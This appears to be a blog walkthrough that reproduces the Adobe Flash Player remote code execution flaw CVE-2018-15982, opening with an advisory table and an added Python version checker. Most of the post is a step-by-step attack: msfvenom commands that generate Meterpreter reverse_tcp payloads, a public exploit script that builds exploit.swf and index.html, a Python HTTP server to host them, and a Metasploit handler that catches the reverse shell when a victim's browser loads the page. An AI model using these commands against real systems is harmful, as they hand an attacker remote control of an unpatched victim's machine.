![](https://i-blog.csdnimg.cn/blog_migrate/49ffad7205fd856638d919479029865d.png)
Vulnerability overview

| Vulnerability name | Adobe Flash Player remote code execution vulnerability |
|---|---|
| Threat type | Remote code execution |
| Threat level | High |
| Vulnerability ID | CVE-2018-15982 |
| Exploitation scenario | An attacker sends the victim a maliciously crafted Office file via a web download, e-mail, instant messaging or a similar channel and lures them into opening it; this can trigger the vulnerability and execute arbitrary instructions on the user's system to gain control. |
| Affected systems and application versions | Adobe Flash Player (31.0.0.153 and earlier) |
| Unaffected systems and application versions | Adobe Flash Player 32.0.0.101 (latest fixed version) |
| Fix and upgrade URL | https://get.adobe.com/flashplayer/ |
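As an added example (not part of the original post), a small Python check that compares installed Flash Player version strings against the affected and fixed versions listed in the table above; the host names and versions in the sample inventory are constructed.

```python
# Added example, not from the original post: check Flash Player version
# strings against the figures in the advisory table above. Per the table,
# 31.0.0.153 and earlier are affected and 32.0.0.101 is the fixed build.
import re

LAST_AFFECTED = (31, 0, 0, 153)   # affected: this build and every earlier one
FIXED_BUILD = (32, 0, 0, 101)     # patched release named in the advisory


def parse_version(text):
    """Turn '31.0.0.153' (or '31,0,0,153', the comma form Flash's
    Capabilities.version reports) into a tuple of four ints so versions
    compare numerically rather than as strings."""
    parts = re.split(r"[.,]", text.strip())
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError("unexpected Flash Player version string: %r" % text)
    return tuple(int(p) for p in parts)


def assess(text):
    """Classify one version string against the advisory ranges."""
    version = parse_version(text)
    if version <= LAST_AFFECTED:
        return "affected"
    if version < FIXED_BUILD:
        # The table names no builds between the two figures; treat them as
        # exposed until verified rather than silently assuming they are safe.
        return "unverified"
    return "not affected"


def hosts_needing_update(inventory):
    """inventory: iterable of (host, version) pairs -> hosts still exposed."""
    return [host for host, version in inventory if assess(version) != "not affected"]


# Constructed sample inventory (hypothetical host names and versions).
SAMPLE_INVENTORY = [
    ("ws-01", "31.0.0.153"),   # last affected build
    ("ws-02", "32.0.0.101"),   # fixed build
    ("ws-03", "30,0,0,134"),   # older build, comma-separated form
    ("ws-04", "32.0.0.100"),   # between the two figures in the table
]

if __name__ == "__main__":
    for host, version in SAMPLE_INVENTORY:
        print(host, version, assess(version))
    print("needs update:", hosts_needing_update(SAMPLE_INVENTORY))
```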
Generate the msf backdoor

```
[email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.177.148 -f raw >86.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
[email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.177.148 -f raw >64.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
```
![](https://i-blog.csdnimg.cn/blog_migrate/183471de84c172882130ee31333a8a55.png)
Generate the exploit

Place the two files generated by msf, 86.bin and 64.bin, in the directory containing the script, then run the script to generate the exploit:

```
[email protected]:~/CVE-2018-15982_EXP-master# python CVE_2018_15982.py -i 86.bin -I 64.bin
[*] Done ! output file --> exploit.swf
[*] Done ! output file --> index.html
[email protected]:~/CVE-2018-15982_EXP-master#
```
![](https://i-blog.csdnimg.cn/blog_migrate/9422a745a85d946ccbac5115abefaf03.png)
Start a local HTTP server

Use Python's built-in server to serve the script's current directory over HTTP:

```
[email protected]:~/CVE-2018-15982_EXP-master# python -m SimpleHTTPServer 8080
```
![](https://i-blog.csdnimg.cn/blog_migrate/bbdf29de5bef4663faa2bcbb21b3237f.png)
Start the MSF reverse listener

```
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf exploit(multi/handler) > set LHOST 192.168.177.148
LHOST => 192.168.177.148
msf exploit(multi/handler) > run
```
![](https://i-blog.csdnimg.cn/blog_migrate/9a5c221e5fce67b878d7569672485149.png)
Reverse shell

Simulate the victim visiting the HTTP service; this triggers the vulnerability and returns a reverse shell.
![](https://i-blog.csdnimg.cn/blog_migrate/6221372334b9e4122805e07406074b1d.png)
IE may crash or stop responding after the page is visited.
![](https://i-blog.csdnimg.cn/blog_migrate/eb83cd04fca18dd57dfef56573d9d9a9.png)
By that point, however, the vulnerability has already been exploited and the shell has been returned to msf.
![](https://i-blog.csdnimg.cn/blog_migrate/dcc465ee5b6acf2b407e31d3a27208a4.png)
Note: once the browser tab that visited the page is closed, the reverse shell connection also drops.
![](https://i-blog.csdnimg.cn/blog_migrate/11bc073c121ffc1c55337d4ad40f2192.png)